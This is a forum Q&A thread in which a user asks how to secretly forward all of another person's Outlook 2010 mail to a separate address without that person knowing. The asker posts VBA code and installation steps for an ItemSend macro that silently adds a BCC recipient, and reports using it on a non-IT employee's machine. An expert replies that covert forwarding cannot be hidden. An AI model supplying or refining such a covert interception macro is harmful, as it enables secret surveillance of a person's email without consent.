Want to win a PS4? Go Premium and enter to win our High-Tech Treats giveaway. Enter to Win

x
?
Solved

How to Forward the sending/receiving mails in outlook 2010.

Posted on 2011-03-22
13
Medium Priority
?
186 Views
Last Modified: 2013-02-13

I need to have a entire copy of mail belongs to particular user into another mail id.
Whatever the user receives and sends should be forwarded into another id without that users knowledge.

I'm using MS-Outlook 2010 client only and not using exchange server.
Can your guide me to acheive this.
0
Comment
Question by:cybersak
  • 5
  • 5
13 Comments
 
LVL 10

Expert Comment

by:Michael_MCDST
ID: 35189695
I believe you need to look into setting up a forwarding rule which can forward these e-mails as Bcc (Blind carbon copy)
http://www.addictivetips.com/microsoft-office/outlook-2010-auto-forward-email-messages/
0
 
LVL 76

Accepted Solution

by:
David Lee earned 2000 total points
ID: 35190662
Hi, cybersak.

That's not possible.  There's no way to send a copy without the sender knowing about it.  You can't use BCC because the sender can see that a message was BCC'd.  You can't use a rule because the user can look and see that there's a rule doing this and because a rulle will leave a copy of the item in Sent Items.  And you can't use a macro because the user could look and see that there's a macro sending their mail out.  The only approach I can think of is to write a program that interfaces with Outlook and forwards the items using a completely different mail system.  
0
 

Author Comment

by:cybersak
ID: 35192170
Tkz for ur prompt comment.

Earlier, i've tried this by adding a tiny VB code for forwarding the outgoing mails.
i.e.,
Private Sub Application_ItemSend(ByVal Item As Object, _Cancel As Boolean)
    Dim objRecip As Recipient
    Dim strMsg As String
    Dim res As Integer
    Dim strBcc As String
    On Error Resume Next

    ' #### USER OPTIONS ####
    ' address for Bcc -- must be SMTP address or resolvable
    ' to a name in the address book
    strBcc = "someone@somewhere.dom"

    Set objRecip = Item.Recipients.Add(strBcc)
    objRecip.Type = olBCC
    If Not objRecip.Resolve Then
        strMsg = "Could not resolve the Bcc recipient. " & _
                 "Do you want still to send the message?"
        res = MsgBox(strMsg, vbYesNo + vbDefaultButton1, _
                "Could Not Resolve Bcc Recipient")
        If res = vbNo Then
            Cancel = True
        End If
    End If

    Set objRecip = Nothing
End Sub

Open in new window


Way i implemented this,
1. Enable the "Developer Tab" in your outlook.
[To enable Developers' Tab, Goto File --> Options --> Customize Ribbon --> Choose Developer]
2. Goto Visual Basic.
3. Expand Project1.
4. ms outook object --> Double click "This outlook Session"
5. Below that place the code.

But after couple of weeks this code was not working.
0
Independent Software Vendors: We Want Your Opinion

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

 
LVL 76

Expert Comment

by:David Lee
ID: 35196952
The user may simply have discovered what was going on and disabled the code.
0
 

Author Comment

by:cybersak
ID: 35204031
I've tested this code on non-IT dept user, they don't have any knowledge about coding. I've checked their systems log file too, but no changes were made.
0
 
LVL 76

Expert Comment

by:David Lee
ID: 35205424
"systems log file"

What would that be?
0
 

Author Comment

by:cybersak
ID: 35242991
I've checked the log file @ also i've recorded their session, then verified it, nothing was changed.
0
 
LVL 76

Expert Comment

by:David Lee
ID: 35255030
I'm still not clear on what "log file" you are referring to.  If the code works when first added but stops working after a couple of weeks, then something had to have changed.  I've worked with Outlook coding long enough to know that it never just stops working.  
0
 

Author Comment

by:cybersak
ID: 35434398
I thought its stopped working due to macro setting.
0
 

Author Comment

by:cybersak
ID: 35453412
Is there any others ways to make a copy of the mails ?
0
 
LVL 76

Expert Comment

by:David Lee
ID: 35453432
Not without the user's knowledge.
0